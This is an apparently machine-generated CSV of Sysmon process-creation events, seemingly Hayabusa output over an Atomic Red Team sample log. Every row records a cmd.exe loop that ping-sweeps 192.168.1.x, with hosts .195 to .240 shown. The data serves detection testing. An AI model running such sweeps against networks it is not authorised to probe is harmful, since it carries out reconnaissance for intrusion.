2019-07-19 23:53:12.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.195 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5244 | PGUID: 747F3D96-D958-5D31-0000-00105ED23600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:12.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.196 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4460 | PGUID: 747F3D96-D958-5D31-0000-001026DB3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:13.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.197 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3352 | PGUID: 747F3D96-D959-5D31-0000-001016DE3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:13.509 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.198 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1136 | PGUID: 747F3D96-D959-5D31-0000-001007E13600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:14.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.199 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 936 | PGUID: 747F3D96-D95A-5D31-0000-0010F7E33600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:14.513 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.200 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4480 | PGUID: 747F3D96-D95A-5D31-0000-0010EBE63600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:15.001 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.201 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6464 | PGUID: 747F3D96-D95A-5D31-0000-0010DBE93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:15.518 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.202 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2392 | PGUID: 747F3D96-D95B-5D31-0000-0010CCEC3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:16.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.203 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2624 | PGUID: 747F3D96-D95C-5D31-0000-001039F03600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:16.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.204 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6804 | PGUID: 747F3D96-D95C-5D31-0000-0010F7F53600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:17.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.205 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 884 | PGUID: 747F3D96-D95D-5D31-0000-001001F93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:17.438 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.206 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5828 | PGUID: 747F3D96-D95D-5D31-0000-0010C8013700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:18.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.207 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3436 | PGUID: 747F3D96-D95E-5D31-0000-0010B5043700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:18.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.208 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6296 | PGUID: 747F3D96-D95E-5D31-0000-0010A1073700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:19.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.209 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4660 | PGUID: 747F3D96-D95F-5D31-0000-0010930A3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:19.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.210 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6184 | PGUID: 747F3D96-D95F-5D31-0000-00107F0D3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:20.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.211 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3932 | PGUID: 747F3D96-D960-5D31-0000-00106B103700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:20.571 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.212 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D960-5D31-0000-001057133700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:21.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.213 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4944 | PGUID: 747F3D96-D961-5D31-0000-0010891F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:21.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.214 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2892 | PGUID: 747F3D96-D961-5D31-0000-001075223700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:22.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.215 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7164 | PGUID: 747F3D96-D962-5D31-0000-001061253700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:22.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.216 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5124 | PGUID: 747F3D96-D962-5D31-0000-0010292E3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:23.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.217 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1996 | PGUID: 747F3D96-D963-5D31-0000-001016313700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:23.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.218 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2884 | PGUID: 747F3D96-D963-5D31-0000-001002343700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:23.993 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.219 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3896 | PGUID: 747F3D96-D963-5D31-0000-0010EF363700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:24.504 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.220 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6856 | PGUID: 747F3D96-D964-5D31-0000-0010DB393700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:25.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.221 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4932 | PGUID: 747F3D96-D965-5D31-0000-0010C73C3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:25.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.222 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1220 | PGUID: 747F3D96-D965-5D31-0000-0010B53F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:26.004 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.223 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5792 | PGUID: 747F3D96-D965-5D31-0000-0010A1423700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:26.430 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.224 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5656 | PGUID: 747F3D96-D966-5D31-0000-00108D453700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:27.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.225 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6632 | PGUID: 747F3D96-D967-5D31-0000-00107C483700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:27.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.226 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5844 | PGUID: 747F3D96-D967-5D31-0000-0010BB513700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:28.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.227 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6396 | PGUID: 747F3D96-D968-5D31-0000-001001553700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:28.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.228 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1452 | PGUID: 747F3D96-D968-5D31-0000-0010F3573700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:29.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.229 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 112 | PGUID: 747F3D96-D969-5D31-0000-0010DF5A3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:29.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.230 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4004 | PGUID: 747F3D96-D969-5D31-0000-0010CB5D3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:30.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.231 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5468 | PGUID: 747F3D96-D96A-5D31-0000-0010B7603700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:30.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.232 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D96A-5D31-0000-0010A3633700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:31.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.233 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D96B-5D31-0000-001090663700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:31.530 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.234 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5016 | PGUID: 747F3D96-D96B-5D31-0000-00107C693700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:32.058 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.235 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-D96C-5D31-0000-00106A6C3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:32.614 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.236 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5488 | PGUID: 747F3D96-D96C-5D31-0000-0010BA763700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:33.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.237 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3228 | PGUID: 747F3D96-D96D-5D31-0000-0010A7793700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:33.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.238 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2804 | PGUID: 747F3D96-D96D-5D31-0000-0010937C3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:34.005 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.239 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4532 | PGUID: 747F3D96-D96D-5D31-0000-0010827F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:34.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.240 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D96E-5D31-0000-00106E823700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
